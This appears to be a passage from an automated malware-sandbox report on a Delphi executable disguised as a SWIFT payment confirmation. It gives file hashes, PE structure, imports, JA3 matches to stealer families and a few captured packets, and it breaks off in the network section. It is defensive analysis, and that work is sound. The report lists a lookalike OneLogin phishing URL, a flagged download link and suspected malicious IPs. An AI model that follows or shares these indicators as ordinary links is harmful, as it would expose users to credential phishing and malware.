                                                                              https://register.edx.org/verizon?&utm_source=vsf_e_paid-ggl-ubrnd&utm_medium=cpc&utm_campaign=GGL%7CEDX%7CAI%7CVSF%7CSEM%7CNBD%7CUS&gad_source=1&gclid=Cj0KCQjwj4K5BhDYARIsAD1Ly2pyzBeRgn77ojfsMTtg7r8SaT93hKq6Ob_f1zsDj7Kj8dy-Mn9a7tMaAng3EALw_wcB&_gl=1*1dphwek*_gcl_aw*R0NMLjE3MzAyMTU4NDAuQ2owS0NRandqNEs1QmhEWUFSSXNBRDFMeTJweXpCZVJnbjc3b2pmc01UdGc3cjhTYVQ5M2hLcTZPYl9mMXpzRGo3S2o4ZHktTW45YTd0TWFBbmczRUFMd193Y0I.*_gcl_au*MzQxNzQzMjE1LjE3MzAyMTU4Mzg.*_ga*MTE0OTEyNzE2Ni4xNzMwMjE1ODM5*_ga_D3KS4KMDT0*MTczMDIxNTgzOS4xLjAuMTczMDIxNTgzOS42MC4wLjAGet hashmaliciousUnknownBrowse
                                                                              • 3.233.158.33
                                                                              https://register.edx.org/verizon?&utm_source=vsf_e_paid-ggl-ubrnd&utm_medium=cpc&utm_campaign=GGL%7CEDX%7CAI%7CVSF%7CSEM%7CNBD%7CUS&gad_source=1&gclid=Cj0KCQjwj4K5BhDYARIsAD1Ly2pyzBeRgn77ojfsMTtg7r8SaT93hKq6Ob_f1zsDj7Kj8dy-Mn9a7tMaAng3EALw_wcB&_gl=1*1dphwek*_gcl_aw*R0NMLjE3MzAyMTU4NDAuQ2owS0NRandqNEs1QmhEWUFSSXNBRDFMeTJweXpCZVJnbjc3b2pmc01UdGc3cjhTYVQ5M2hLcTZPYl9mMXpzRGo3S2o4ZHktTW45YTd0TWFBbmczRUFMd193Y0I.*_gcl_au*MzQxNzQzMjE1LjE3MzAyMTU4Mzg.*_ga*MTE0OTEyNzE2Ni4xNzMwMjE1ODM5*_ga_D3KS4KMDT0*MTczMDIxNTgzOS4xLjAuMTczMDIxNTgzOS42MC4wLjAGet hashmaliciousUnknownBrowse
                                                                              • 3.233.158.31
                                                                              https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9Get hashmaliciousUnknownBrowse
                                                                              • 54.157.235.205
                                                                              https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                              • 107.20.90.72
                                                                              weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                              • 18.232.196.105
                                                                              weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                              • 3.93.255.10
                                                                              https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963Get hashmaliciousKnowBe4Browse
                                                                              • 3.93.255.10
                                                                              AMAZON-02USBbkbL3gS6s.msiGet hashmaliciousUnknownBrowse
                                                                              • 13.32.121.113
                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                              • 18.244.18.27
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              • 18.244.18.122
                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                              • 13.249.21.26
                                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                              • 54.171.230.55
                                                                              Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              • 18.244.18.32
                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                              • 54.171.230.55
                                                                              Arquivo_4593167.msiGet hashmaliciousAteraAgentBrowse
                                                                              • 13.35.58.7
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              • 18.244.18.38
                                                                              AMAZON-02USBbkbL3gS6s.msiGet hashmaliciousUnknownBrowse
                                                                              • 13.32.121.113
                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                              • 18.244.18.27
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              • 18.244.18.122
                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                              • 13.249.21.26
                                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                              • 54.171.230.55
                                                                              Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              • 18.244.18.32
                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                              • 54.171.230.55
                                                                              Arquivo_4593167.msiGet hashmaliciousAteraAgentBrowse
                                                                              • 13.35.58.7
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              • 18.244.18.38

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228
                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228
                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228
                                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 3.5.29.82
                                                                              • 185.166.143.50
                                                                              • 52.217.102.228

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              No created / dropped files found

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.885359483437513
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              File name:Swift payment confirmation.exe
                                                                              File size:1'033'216 bytes
                                                                              MD5:92fdcc36be7b26d49f67f2f02fefbf07
                                                                              SHA1:f84b37ff359f55cdfc1c60a640cc7081b523e5ce
                                                                              SHA256:61cf08eac40229e089f7630d5412aa0a8282c01d6348763d92d68e2fcb92e24e
                                                                              SHA512:51e32e91a5fa9545abfb822d36d9f5e6613b0a1f6919ffd84748cfd388333ebbb1760b52704fd2c44dd77fab81826e19b25efd260cdf4695b3890f1c8bcc7afb
                                                                              SSDEEP:24576:HccTfHWId4iO+0SvkMVIDT8Jf3pbV13Jks:H3VHVI8t5X
                                                                              TLSH:BC259D2A35C48671E172167A1C03D79C865D3D223D28A06F7DF45F3CFA706892A26FA7
                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:2c2c4c1633596c70

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x45a78c
                                                                              Entrypoint Section:.itext
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:db18ce55573d1364254a744733a4f690

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              add esp, FFFFFFF0h
                                                                              mov eax, 00459110h
                                                                              call 00007F2260B4A2D9h
                                                                              mov eax, dword ptr [0045CAD4h]
                                                                              mov eax, dword ptr [eax]
                                                                              call 00007F2260B95965h
                                                                              mov ecx, dword ptr [0045CBC0h]
                                                                              mov eax, dword ptr [0045CAD4h]
                                                                              mov eax, dword ptr [eax]
                                                                              mov edx, dword ptr [00458E74h]
                                                                              call 00007F2260B95965h
                                                                              mov eax, dword ptr [0045CAD4h]
                                                                              mov eax, dword ptr [eax]
                                                                              call 00007F2260B959D9h
                                                                              call 00007F2260B482E4h
                                                                              lea eax, dword ptr [eax+00h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x610000x248c.idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x98a00.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000x6214.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x650000x18.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x616cc0x5b4.idata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x583680x5840040216aa106ef9cf24d7ec81b20da3a20False0.5237307453966006data6.511023944362515IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .itext0x5a0000x7d40x800ec158d9354ec036c95e9681eadfa071bFalse0.61474609375data6.159007676197002IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .data0x5b0000x1c5c0x1e000a767d60727a1cb8ab1a008d30e6367aFalse0.3888020833333333data3.7484395349153488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .bss0x5d0000x36a80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .idata0x610000x248c0x260020c34700bef265e7c5fe74503dabdc99False0.3132195723684211data5.076702956477193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .tls0x640000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rdata0x650000x180x200a9c4f92be74836485bd87aefc4a62a93False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x660000x62140x64000164d5ce0bf3cd073885cbbdf35d03fdFalse0.6538671875data6.6594794007205405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x6d0000x98a000x98a00f2552497c0069afdb65217092024c7ccFalse0.3929396370802621data6.521474797335086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_CURSOR0x6ddfc0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                              RT_CURSOR0x6df300x134dataEnglishUnited States0.4642857142857143
                                                                              RT_CURSOR0x6e0640x134dataEnglishUnited States0.4805194805194805
                                                                              RT_CURSOR0x6e1980x134dataEnglishUnited States0.38311688311688313
                                                                              RT_CURSOR0x6e2cc0x134dataEnglishUnited States0.36038961038961037
                                                                              RT_CURSOR0x6e4000x134dataEnglishUnited States0.4090909090909091
                                                                              RT_CURSOR0x6e5340x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                              RT_BITMAP0x6e6680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                              RT_BITMAP0x6e8380x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                              RT_BITMAP0x6ea1c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                              RT_BITMAP0x6ebec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                              RT_BITMAP0x6edbc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                              RT_BITMAP0x6ef8c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                              RT_BITMAP0x6f15c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                              RT_BITMAP0x6f32c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                              RT_BITMAP0x6f4fc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                              RT_BITMAP0x6f6cc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                              RT_BITMAP0x6f89c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                                              RT_BITMAP0x6f95c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                                              RT_BITMAP0x6fa3c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                                              RT_BITMAP0x6fb1c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                                              RT_BITMAP0x6fbfc0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                                              RT_BITMAP0x6fcbc0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                                              RT_BITMAP0x6fd7c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                                              RT_BITMAP0x6fe5c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                                              RT_BITMAP0x6ff1c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                                              RT_BITMAP0x6fffc0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                              RT_BITMAP0x700e40xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                                              RT_BITMAP0x701a40xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                              RT_ICON0x702840x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.3139344262295082
                                                                              RT_ICON0x70c0c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.2352251407129456
                                                                              RT_ICON0x71cb40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.16815352697095437
                                                                              RT_DIALOG0x7425c0x52data0.7682926829268293
                                                                              RT_DIALOG0x742b00x52data0.7560975609756098
                                                                              RT_STRING0x743040x2cdata0.4772727272727273
                                                                              RT_STRING0x743300x2b4data0.476878612716763
                                                                              RT_STRING0x745e40xb4data0.6888888888888889
                                                                              RT_STRING0x746980xe8data0.6422413793103449
                                                                              RT_STRING0x747800x2a8data0.4764705882352941
                                                                              RT_STRING0x74a280x3e8data0.382
                                                                              RT_STRING0x74e100x370data0.4022727272727273
                                                                              RT_STRING0x751800x3ccdata0.33539094650205764
                                                                              RT_STRING0x7554c0x214data0.49624060150375937
                                                                              RT_STRING0x757600xccdata0.6274509803921569
                                                                              RT_STRING0x7582c0x194data0.5643564356435643
                                                                              RT_STRING0x759c00x3c4data0.3288381742738589
                                                                              RT_STRING0x75d840x338data0.42961165048543687
                                                                              RT_STRING0x760bc0x294data0.42424242424242425
                                                                              RT_RCDATA0x763500x10data1.5
                                                                              RT_RCDATA0x763600x31cdata0.7010050251256281
                                                                              RT_RCDATA0x7667c0x189Delphi compiled form 'TForm1'0.7582697201017812
                                                                              RT_RCDATA0x768080x8f0bcdataEnglishUnited States0.40106602311594153
                                                                              RT_GROUP_CURSOR0x1058c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                              RT_GROUP_CURSOR0x1058d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                              RT_GROUP_CURSOR0x1058ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                              RT_GROUP_CURSOR0x1059000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                              RT_GROUP_CURSOR0x1059140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                              RT_GROUP_CURSOR0x1059280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                              RT_GROUP_CURSOR0x10593c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                              RT_GROUP_ICON0x1059500x30data0.9375

                                                                              Imports

                                                                              DLLImport
                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                              user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                              kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                              user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                              kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                              kernel32.dllSleep
                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                              comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 31, 2024 09:06:57.143939972 CET49704443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:06:57.143966913 CET44349704185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:06:57.144051075 CET49704443192.168.2.5185.166.143.50
